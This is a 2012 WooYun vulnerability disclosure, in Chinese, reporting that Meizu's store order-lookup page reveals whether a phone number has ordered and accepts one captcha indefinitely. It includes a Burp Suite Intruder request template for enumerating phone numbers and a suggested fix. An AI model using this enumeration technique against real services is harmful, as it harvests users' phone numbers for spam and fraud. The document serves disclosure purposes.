当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-016339

漏洞标题:魅族科技可能会泄露用户手机号码

相关厂商:魅族科技

漏洞作者: imlonghao

提交时间:2012-12-21 20:41

修复时间:2012-12-26 20:41

公开时间:2012-12-26 20:41

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-12-21: 细节已通知厂商并且等待厂商处理中
2012-12-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

虽然我没有MX,但是我是一个好的煤油!
如果你愿意,请让我成为一名正式的煤油!
-:)

详细说明:

漏洞出在手机号码查询订单的地方,提交一个手机号码时,会提示该手机是否曾经提交过订单,同时,验证码纯属摆设,没有一个失效,允许同一个验证码进行多次查询。
利用:非法分子得到魅族用户手机号码——)发送广告短信或进行其他欺骗等(指定对象)

漏洞证明:

burp suite 下的入侵者功能!

GET http://store.meizu.com/myorder/sms_chknum?phone=§§&captcha=pdhh HTTP/1.1
Host: store.meizu.com
Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.96 Safari/537.4
Accept: */*
Referer: http://store.meizu.com/myorder/phone_detail.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: XXXXXXXX


QQ截图20121221203747.png


跑了一下,成功了许多!
如果无法复现成功,欢迎与我联系!

修复方案:

赠送一部MX2!!!!
))验证码一次性使用,使用一次即失效!

版权声明:转载请注明来源 imlonghao@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-12-26 20:41

厂商回复:

最新状态:

2013-01-05:我们已经知悉并尽快处理,谢谢!